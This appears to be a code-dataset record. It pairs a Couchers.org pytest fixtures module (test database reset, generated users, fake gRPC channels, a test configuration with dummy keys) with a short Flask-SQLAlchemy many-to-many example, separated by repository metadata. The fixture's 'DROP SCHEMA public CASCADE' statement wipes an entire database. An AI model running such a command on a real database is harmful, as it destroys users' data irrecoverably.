from couchers.servicers.resources import Resources
from couchers.servicers.search import Search
from couchers.servicers.threads import Threads
from couchers.sql import couchers_select as select
from couchers.utils import create_coordinate, now
from proto import (
account_pb2_grpc,
admin_pb2_grpc,
api_pb2_grpc,
auth_pb2_grpc,
blocking_pb2_grpc,
bugs_pb2_grpc,
communities_pb2_grpc,
conversations_pb2_grpc,
discussions_pb2_grpc,
donations_pb2_grpc,
events_pb2_grpc,
groups_pb2_grpc,
jail_pb2_grpc,
media_pb2_grpc,
notifications_pb2_grpc,
pages_pb2_grpc,
references_pb2_grpc,
reporting_pb2_grpc,
requests_pb2_grpc,
resources_pb2_grpc,
search_pb2_grpc,
stripe_pb2_grpc,
threads_pb2_grpc,
)
def drop_all():
"""drop everything currently in the database"""
with session_scope() as session:
# postgis is required for all the Geographic Information System (GIS) stuff
# pg_trgm is required for trigram based search
# btree_gist is required for gist-based exclusion constraints
session.execute(
text(
"DROP SCHEMA public CASCADE; DROP SCHEMA IF EXISTS logging CASCADE; CREATE SCHEMA public; CREATE SCHEMA logging; CREATE EXTENSION postgis; CREATE EXTENSION pg_trgm; CREATE EXTENSION btree_gist;"
)
)
def create_schema_from_models():
"""
Create everything from the current models, not incrementally
through migrations.
"""
# create the slugify function
functions = Path(__file__).parent / "slugify.sql"
with open(functions) as f, session_scope() as session:
session.execute(text(f.read()))
Base.metadata.create_all(get_engine())
def populate_testing_resources(session):
"""
Testing version of couchers.resources.copy_resources_to_database
"""
regions = [
("AUS", "Australia"),
("CAN", "Canada"),
("CHE", "Switzerland"),
("CUB", "Cuba"),
("CXR", "Christmas Island"),
("CZE", "Czechia"),
("DEU", "Germany"),
("EGY", "Egypt"),
("ESP", "Spain"),
("EST", "Estonia"),
("FIN", "Finland"),
("FRA", "France"),
("GBR", "United Kingdom"),
("GEO", "Georgia"),
("GHA", "Ghana"),
("GRC", "Greece"),
("HKG", "Hong Kong"),
("IRL", "Ireland"),
("ISR", "Israel"),
("ITA", "Italy"),
("JPN", "Japan"),
("LAO", "Laos"),
("MEX", "Mexico"),
("MMR", "Myanmar"),
("NAM", "Namibia"),
("NLD", "Netherlands"),
("NZL", "New Zealand"),
("POL", "Poland"),
("PRK", "North Korea"),
("REU", "Réunion"),
("SGP", "Singapore"),
("SWE", "Sweden"),
("THA", "Thailand"),
("TUR", "Turkey"),
("TWN", "Taiwan"),
("USA", "United States"),
("VNM", "Vietnam"),
]
languages = [
("arb", "Arabic (Standard)"),
("deu", "German"),
("eng", "English"),
("fin", "Finnish"),
("fra", "French"),
("heb", "Hebrew"),
("hun", "Hungarian"),
("jpn", "Japanese"),
("pol", "Polish"),
("swe", "Swedish"),
("cmn", "Chinese (Mandarin)"),
]
with open(Path(__file__).parent / ".." / ".." / "resources" / "timezone_areas.sql-fake", "r") as f:
tz_sql = f.read()
for code, name in regions:
session.add(Region(code=code, name=name))
for code, name in languages:
session.add(Language(code=code, name=name))
session.execute(text(tz_sql))
def recreate_database():
"""
Connect to a running Postgres database, build it using metadata.create_all()
"""
# running in non-UTC catches some timezone errors
os.environ["TZ"] = "America/New_York"
# drop everything currently in the database
drop_all()
# create everything from the current models, not incrementally through migrations
create_schema_from_models()
with session_scope() as session:
populate_testing_resources(session)
@pytest.fixture()
def db():
"""
Pytest fixture to connect to a running Postgres database and build it using metadata.create_all()
"""
recreate_database()
def generate_user(*, make_invisible=False, **kwargs):
"""
Create a new user, return session token
The user is detached from any session, and you can access its static attributes, but you can't modify it
Use this most of the time
"""
auth = Auth()
with session_scope() as session:
# default args
username = "test_user_" + random_hex(16)
user_opts = {
"username": username,
"email": f"{username}@dev.couchers.org",
# password is just 'password'
# this is hardcoded because the password is slow to hash (so would slow down tests otherwise)
"hashed_password": b"$argon2id$v=19$m=65536,t=2,p=1$4cjGg1bRaZ10k+7XbIDmFg$tZG7JaLrkfyfO7cS233ocq7P8rf3znXR7SAfUt34kJg",
"name": username.capitalize(),
"city": "Testing city",
"hometown": "Test hometown",
"community_standing": 0.5,
"birthdate": date(year=2000, month=1, day=1),
"gender": "N/A",
"pronouns": "",
"occupation": "Tester",
"education": "UST(esting)",
"about_me": "I test things",
"my_travels": "Places",
"things_i_like": "Code",
"about_place": "My place has a lot of testing paraphenelia",
"additional_information": "I can be a bit testy",
# you need to make sure to update this logic to make sure the user is jailed/not on request
"accepted_tos": TOS_VERSION,
"accepted_community_guidelines": GUIDELINES_VERSION,
"geom": create_coordinate(40.7108, -73.9740),
"geom_radius": 100,
"onboarding_emails_sent": 1,
"last_onboarding_email_sent": now(),
"new_notifications_enabled": True,
}
for key, value in kwargs.items():
user_opts[key] = value
user = User(**user_opts)
session.add(user)
session.flush()
session.add(RegionVisited(user_id=user.id, region_code="CHE"))
session.add(RegionVisited(user_id=user.id, region_code="REU"))
session.add(RegionVisited(user_id=user.id, region_code="FIN"))
session.add(RegionLived(user_id=user.id, region_code="ESP"))
session.add(RegionLived(user_id=user.id, region_code="FRA"))
session.add(RegionLived(user_id=user.id, region_code="EST"))
session.add(LanguageAbility(user_id=user.id, language_code="fin", fluency=LanguageFluency.fluent))
session.add(LanguageAbility(user_id=user.id, language_code="fra", fluency=LanguageFluency.beginner))
# this expires the user, so now it's "dirty"
session.commit()
class _DummyContext:
def invocation_metadata(self):
return {}
token, _ = create_session(_DummyContext(), session, user, False)
# deleted user aborts session creation, hence this follows and necessitates a second commit
if make_invisible:
user.is_deleted = True
session.commit()
# refresh it, undoes the expiry
session.refresh(user)
# allows detaches the user from the session, allowing its use outside this session
session.expunge(user)
return user, token
def get_user_id_and_token(session, username):
    """Return (user_id, session_token) for the user with the given username."""
    user = session.execute(select(User).where(User.username == username)).scalar_one()
    sesh = session.execute(select(UserSession).where(UserSession.user_id == user.id)).scalar_one()
    return user.id, sesh.token
def make_friends(user1, user2):
    """Insert an already-accepted FriendRelationship from user1 to user2."""
    with session_scope() as session:
        session.add(
            FriendRelationship(
                from_user_id=user1.id,
                to_user_id=user2.id,
                status=FriendStatus.accepted,
            )
        )
def make_user_block(user1, user2):
    """Make user1 block user2 by inserting a UserBlock row."""
    with session_scope() as session:
        block = UserBlock(blocking_user_id=user1.id, blocked_user_id=user2.id)
        session.add(block)
        session.commit()
def make_user_invisible(user_id):
    """Hide the user from the platform by flagging them as banned."""
    with session_scope() as session:
        user = session.execute(select(User).where(User.id == user_id)).scalar_one()
        user.is_banned = True
# This doubles as get_FriendRequest, since a friend request is just a pending friend relationship
def get_friend_relationship(user1, user2):
    """
    Return the FriendRelationship between the two users (in either direction),
    or None if there is none.

    Bug fix: the original combined the two column comparisons with Python's
    `and`, which does not build a SQL conjunction — it evaluates truthiness of
    a SQLAlchemy ClauseElement and yields just one of the comparisons, so the
    filter matched relationships touching either user regardless of the other
    side. SQLAlchemy conjunctions must use `and_()` or the `&` operator.
    """
    with session_scope() as session:
        friend_relationship = session.execute(
            select(FriendRelationship).where(
                or_(
                    (FriendRelationship.from_user_id == user1.id) & (FriendRelationship.to_user_id == user2.id),
                    (FriendRelationship.from_user_id == user2.id) & (FriendRelationship.to_user_id == user1.id),
                )
            )
        ).scalar_one_or_none()
        if friend_relationship is not None:
            # detach so the object remains usable after the session closes
            session.expunge(friend_relationship)
        return friend_relationship
class CookieMetadataPlugin(grpc.AuthMetadataPlugin):
    """
    Injects the right `cookie: couchers-sesh=...` header into the metadata
    """
    def __init__(self, token):
        self.token = token
    def __call__(self, context, callback):
        cookie_header = ("cookie", f"couchers-sesh={self.token}")
        callback((cookie_header,), None)
class FakeRpcError(grpc.RpcError):
    """grpc.RpcError stand-in that carries an explicit status code and details."""
    def __init__(self, code, details):
        self._status = (code, details)
    def code(self):
        return self._status[0]
    def details(self):
        return self._status[1]
class FakeChannel:
    """
    In-process stand-in for both a gRPC channel and a servicer context, so
    stubs can call servicers directly without a network.
    """
    def __init__(self, user_id=None):
        self.handlers = {}
        self.user_id = user_id
    def abort(self, code, details):
        # mimics grpc.ServicerContext.abort by raising a fake RpcError
        raise FakeRpcError(code, details)
    def add_generic_rpc_handlers(self, generic_rpc_handlers):
        from grpc._server import _validate_generic_rpc_handlers
        _validate_generic_rpc_handlers(generic_rpc_handlers)
        self.handlers.update(generic_rpc_handlers[0]._method_handlers)
    def unary_unary(self, uri, request_serializer, response_deserializer):
        method_handler = self.handlers[uri]
        def call(request):
            # Round-trip serialize both the request and the response to catch
            # accidental use of unserializable data.
            deserialized = method_handler.request_deserializer(request_serializer(request))
            reply = method_handler.unary_unary(deserialized, self)
            return response_deserializer(method_handler.response_serializer(reply))
        return call
@contextmanager
def auth_api_session():
    """
    Create an Auth API for testing
    This needs to use the real server since it plays around with headers
    """
    with futures.ThreadPoolExecutor(1) as executor:
        server = grpc.server(executor)
        # port 0 asks the OS for any free port; add_secure_port returns the bound port
        port = server.add_secure_port("localhost:0", grpc.local_server_credentials())
        auth_pb2_grpc.add_AuthServicer_to_server(Auth(), server)
        server.start()
        try:
            with grpc.secure_channel(f"localhost:{port}", grpc.local_channel_credentials()) as channel:
                class _MetadataKeeperInterceptor(grpc.UnaryUnaryClientInterceptor):
                    # Client interceptor that records the initial metadata (response
                    # headers, e.g. set-cookie) of the most recent call for inspection.
                    def __init__(self):
                        self.latest_headers = {}
                    def intercept_unary_unary(self, continuation, client_call_details, request):
                        call = continuation(client_call_details, request)
                        self.latest_headers = dict(call.initial_metadata())
                        return call
                metadata_interceptor = _MetadataKeeperInterceptor()
                # wrap the channel so every call flows through the interceptor
                channel = grpc.intercept_channel(channel, metadata_interceptor)
                yield auth_pb2_grpc.AuthStub(channel), metadata_interceptor
        finally:
            # wait for full shutdown before the executor context exits
            server.stop(None).wait()
@contextmanager
def api_session(token):
    """Yield an API stub backed by a FakeChannel, authenticated via `token`."""
    ch = fake_channel(token)
    api_pb2_grpc.add_APIServicer_to_server(API(), ch)
    yield api_pb2_grpc.APIStub(ch)
@contextmanager
def real_api_session(token):
    """Yield an API stub over a real TCP socket, authenticated via `token`."""
    with futures.ThreadPoolExecutor(1) as pool:
        srv = grpc.server(pool, interceptors=[AuthValidatorInterceptor()])
        port = srv.add_secure_port("localhost:0", grpc.local_server_credentials())
        api_pb2_grpc.add_APIServicer_to_server(API(), srv)
        srv.start()
        # attach the session cookie to every call made on this channel
        creds = grpc.composite_channel_credentials(
            grpc.local_channel_credentials(),
            grpc.metadata_call_credentials(CookieMetadataPlugin(token)),
        )
        try:
            with grpc.secure_channel(f"localhost:{port}", creds) as chan:
                yield api_pb2_grpc.APIStub(chan)
        finally:
            srv.stop(None).wait()
@contextmanager
def real_admin_session(token):
    """Yield an Admin service stub over a real TCP socket, authenticated via `token`."""
    with futures.ThreadPoolExecutor(1) as pool:
        srv = grpc.server(pool, interceptors=[AuthValidatorInterceptor()])
        port = srv.add_secure_port("localhost:0", grpc.local_server_credentials())
        admin_pb2_grpc.add_AdminServicer_to_server(Admin(), srv)
        srv.start()
        # attach the session cookie to every call made on this channel
        creds = grpc.composite_channel_credentials(
            grpc.local_channel_credentials(),
            grpc.metadata_call_credentials(CookieMetadataPlugin(token)),
        )
        try:
            with grpc.secure_channel(f"localhost:{port}", creds) as chan:
                yield admin_pb2_grpc.AdminStub(chan)
        finally:
            srv.stop(None).wait()
@contextmanager
def real_jail_session(token):
    """Yield a Jail service stub over a real TCP socket, authenticated via `token`."""
    with futures.ThreadPoolExecutor(1) as pool:
        srv = grpc.server(pool, interceptors=[AuthValidatorInterceptor()])
        port = srv.add_secure_port("localhost:0", grpc.local_server_credentials())
        jail_pb2_grpc.add_JailServicer_to_server(Jail(), srv)
        srv.start()
        # attach the session cookie to every call made on this channel
        creds = grpc.composite_channel_credentials(
            grpc.local_channel_credentials(),
            grpc.metadata_call_credentials(CookieMetadataPlugin(token)),
        )
        try:
            with grpc.secure_channel(f"localhost:{port}", creds) as chan:
                yield jail_pb2_grpc.JailStub(chan)
        finally:
            srv.stop(None).wait()
def fake_channel(token):
    """Build a FakeChannel authenticated as the user who owns `token`."""
    user_id, _jailed, _is_superuser = _try_get_and_update_user_details(token, is_api_key=False)
    return FakeChannel(user_id=user_id)
@contextmanager
def conversations_session(token):
    """Yield a Conversations API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    conversations_pb2_grpc.add_ConversationsServicer_to_server(Conversations(), ch)
    yield conversations_pb2_grpc.ConversationsStub(ch)
@contextmanager
def requests_session(token):
    """Yield a Requests API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    requests_pb2_grpc.add_RequestsServicer_to_server(Requests(), ch)
    yield requests_pb2_grpc.RequestsStub(ch)
@contextmanager
def threads_session(token):
    """Yield a Threads API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    threads_pb2_grpc.add_ThreadsServicer_to_server(Threads(), ch)
    yield threads_pb2_grpc.ThreadsStub(ch)
@contextmanager
def discussions_session(token):
    """Yield a Discussions API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    discussions_pb2_grpc.add_DiscussionsServicer_to_server(Discussions(), ch)
    yield discussions_pb2_grpc.DiscussionsStub(ch)
@contextmanager
def donations_session(token):
    """Yield a Donations API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    donations_pb2_grpc.add_DonationsServicer_to_server(Donations(), ch)
    yield donations_pb2_grpc.DonationsStub(ch)
@contextmanager
def real_stripe_session():
    """Yield a Stripe service stub over a real TCP socket (no user auth needed)."""
    with futures.ThreadPoolExecutor(1) as pool:
        srv = grpc.server(pool, interceptors=[AuthValidatorInterceptor()])
        port = srv.add_secure_port("localhost:0", grpc.local_server_credentials())
        stripe_pb2_grpc.add_StripeServicer_to_server(Stripe(), srv)
        srv.start()
        try:
            with grpc.secure_channel(f"localhost:{port}", grpc.local_channel_credentials()) as chan:
                yield stripe_pb2_grpc.StripeStub(chan)
        finally:
            srv.stop(None).wait()
@contextmanager
def pages_session(token):
    """Yield a Pages API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    pages_pb2_grpc.add_PagesServicer_to_server(Pages(), ch)
    yield pages_pb2_grpc.PagesStub(ch)
@contextmanager
def communities_session(token):
    """Yield a Communities API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    communities_pb2_grpc.add_CommunitiesServicer_to_server(Communities(), ch)
    yield communities_pb2_grpc.CommunitiesStub(ch)
@contextmanager
def groups_session(token):
    """Yield a Groups API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    groups_pb2_grpc.add_GroupsServicer_to_server(Groups(), ch)
    yield groups_pb2_grpc.GroupsStub(ch)
@contextmanager
def blocking_session(token):
    """Yield a Blocking API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    blocking_pb2_grpc.add_BlockingServicer_to_server(Blocking(), ch)
    yield blocking_pb2_grpc.BlockingStub(ch)
@contextmanager
def notifications_session(token):
    """Yield a Notifications API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    notifications_pb2_grpc.add_NotificationsServicer_to_server(Notifications(), ch)
    yield notifications_pb2_grpc.NotificationsStub(ch)
@contextmanager
def account_session(token):
    """Yield an Account API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    account_pb2_grpc.add_AccountServicer_to_server(Account(), ch)
    yield account_pb2_grpc.AccountStub(ch)
@contextmanager
def search_session(token):
    """Yield a Search API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    search_pb2_grpc.add_SearchServicer_to_server(Search(), ch)
    yield search_pb2_grpc.SearchStub(ch)
@contextmanager
def references_session(token):
    """Yield a References API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    references_pb2_grpc.add_ReferencesServicer_to_server(References(), ch)
    yield references_pb2_grpc.ReferencesStub(ch)
@contextmanager
def reporting_session(token):
    """Yield a Reporting API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    reporting_pb2_grpc.add_ReportingServicer_to_server(Reporting(), ch)
    yield reporting_pb2_grpc.ReportingStub(ch)
@contextmanager
def events_session(token):
    """Yield an Events API stub for testing, authenticated via `token`."""
    ch = fake_channel(token)
    events_pb2_grpc.add_EventsServicer_to_server(Events(), ch)
    yield events_pb2_grpc.EventsStub(ch)
@contextmanager
def bugs_session(token=None):
    """Yield a Bugs API stub; authenticated when `token` is given, anonymous otherwise."""
    ch = fake_channel(token) if token else FakeChannel()
    bugs_pb2_grpc.add_BugsServicer_to_server(Bugs(), ch)
    yield bugs_pb2_grpc.BugsStub(ch)
@contextmanager
def resources_session():
    """Yield a Resources API stub for testing (no auth required)."""
    ch = FakeChannel()
    resources_pb2_grpc.add_ResourcesServicer_to_server(Resources(), ch)
    yield resources_pb2_grpc.ResourcesStub(ch)
@contextmanager
def media_session(bearer_token):
    """Yield a fresh Media API stub over TCP, using `bearer_token` for media auth."""
    with futures.ThreadPoolExecutor(1) as pool:
        srv = grpc.server(pool, interceptors=[get_media_auth_interceptor(bearer_token)])
        port = srv.add_secure_port("localhost:0", grpc.local_server_credentials())
        media_pb2_grpc.add_MediaServicer_to_server(Media(), srv)
        srv.start()
        # send the bearer token with every call on this channel
        creds = grpc.composite_channel_credentials(
            grpc.local_channel_credentials(),
            grpc.access_token_call_credentials(bearer_token),
        )
        try:
            with grpc.secure_channel(f"localhost:{port}", creds) as chan:
                yield media_pb2_grpc.MediaStub(chan)
        finally:
            srv.stop(None).wait()
@pytest.fixture()
def testconfig():
    """Swap in a known-good test configuration, restoring the prior config afterwards."""
    saved = config.copy()
    config.clear()
    config.update(saved)
    config.update({
        "IN_TEST": True,
        "DEV": True,
        "VERSION": "testing_version",
        "BASE_URL": "http://localhost:3000",
        "COOKIE_DOMAIN": "localhost",
        "ENABLE_SMS": False,
        "SMS_SENDER_ID": "invalid",
        "ENABLE_EMAIL": False,
        "NOTIFICATION_EMAIL_SENDER": "Couchers.org",
        "NOTIFICATION_EMAIL_ADDRESS": "notify@couchers.org.invalid",
        "NOTIFICATION_EMAIL_PREFIX": "[TEST] ",
        "REPORTS_EMAIL_RECIPIENT": "reports@couchers.org.invalid",
        "CONTRIBUTOR_FORM_EMAIL_RECIPIENT": "forms@couchers.org.invalid",
        "ENABLE_DONATIONS": False,
        "STRIPE_API_KEY": "",
        "STRIPE_WEBHOOK_SECRET": "",
        "STRIPE_RECURRING_PRODUCT_ID": "",
        "SMTP_HOST": "localhost",
        "SMTP_PORT": 587,
        "SMTP_USERNAME": "username",
        "SMTP_PASSWORD": "password",
        "ENABLE_MEDIA": True,
        "MEDIA_SERVER_SECRET_KEY": bytes.fromhex(
            "91e29bbacc74fa7e23c5d5f34cca5015cb896e338a620003de94a502a461f4bc"
        ),
        "MEDIA_SERVER_BEARER_TOKEN": "c02d383897d3b82774ced09c9e17802164c37e7e105d8927553697bf4550e91e",
        "MEDIA_SERVER_BASE_URL": "http://127.0.0.1:5000",
        "BUG_TOOL_ENABLED": False,
        "BUG_TOOL_GITHUB_REPO": "org/repo",
        "BUG_TOOL_GITHUB_USERNAME": "user",
        "BUG_TOOL_GITHUB_TOKEN": "token",
        "MAILCHIMP_ENABLED": False,
        "MAILCHIMP_API_KEY": "f...",
        "MAILCHIMP_DC": "us10",
        "MAILCHIMP_LIST_ID": "b...",
    })
    yield None
    config.clear()
    config.update(saved)
@pytest.fixture
def fast_passwords():
    """
    Password hashing is deliberately slow, which drags the tests down; for the
    duration of the test, replace the nacl hash/verify pair with trivial fakes.
    """
    def _hash(password: bytes) -> bytes:
        return b"fake hash:" + password
    def _verify(hashed: bytes, password: bytes) -> bool:
        return hashed == _hash(password)
    with patch("couchers.crypto.nacl.pwhash.verify", _verify), patch(
        "couchers.crypto.nacl.pwhash.str", _hash
    ):
        yield
| 7,306 | 55 | 921 |
27e2b7dcc45a15d15fd62186d87eade382c87799 | 1,116 | py | Python | flask_project/sqlalchemy/hello_v22.py | FatemehRahmanzadeh/flask_project_maktab | 6e9f28d67695dde3fd4f8ed59d3a507cb6f5a5ec | [
"Apache-2.0"
] | 2 | 2021-08-14T09:10:39.000Z | 2021-08-24T05:05:43.000Z | flask_project/sqlalchemy/hello_v22.py | FatemehRahmanzadeh/flask_project_maktab | 6e9f28d67695dde3fd4f8ed59d3a507cb6f5a5ec | [
"Apache-2.0"
] | null | null | null | flask_project/sqlalchemy/hello_v22.py | FatemehRahmanzadeh/flask_project_maktab | 6e9f28d67695dde3fd4f8ed59d3a507cb6f5a5ec | [
"Apache-2.0"
] | 20 | 2021-08-13T11:29:31.000Z | 2021-09-04T17:53:57.000Z | from datetime import datetime
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///relation_hello_v22.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
student_identifier = db.Table('student_identifier',
db.Column('class_id', db.Integer, db.ForeignKey('classes.class_id')),
db.Column('user_id', db.Integer, db.ForeignKey('students.user_id'))
)
# s = Student()
# c = Class()
# c.students.append(s)
# db.session.add(c)
# db.session.commit() | 30.162162 | 73 | 0.710573 | from datetime import datetime
from flask import Flask, render_template, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# SQLite database file; modification tracking disabled to avoid its overhead
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///relation_hello_v22.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
# Association table implementing the many-to-many link between classes and students.
student_identifier = db.Table('student_identifier',
                              db.Column('class_id', db.Integer, db.ForeignKey('classes.class_id')),
                              db.Column('user_id', db.Integer, db.ForeignKey('students.user_id'))
                              )
class Student(db.Model):
    """A student; can belong to many classes via the student_identifier table."""
    __tablename__ = 'students'
    # primary key
    user_id = db.Column(db.Integer, primary_key=True)
    # NOTE(review): "fistName" looks like a typo for "firstName"; renaming would
    # change the mapped column/attribute name, so confirm with callers before fixing.
    user_fistName = db.Column(db.String(64))
    user_lastName = db.Column(db.String(64))
    user_email = db.Column(db.String(128), unique=True)
class Class(db.Model):
    """A class; `students` is a many-to-many relationship through student_identifier."""
    __tablename__ = 'classes'
    class_id = db.Column(db.Integer, primary_key=True)
    class_name = db.Column(db.String(128), unique=True)
    students = db.relationship("Student",
                               secondary=student_identifier)
# s = Student()
# c = Class()
# c.students.append(s)
# db.session.add(c)
# db.session.commit() | 0 | 479 | 46 |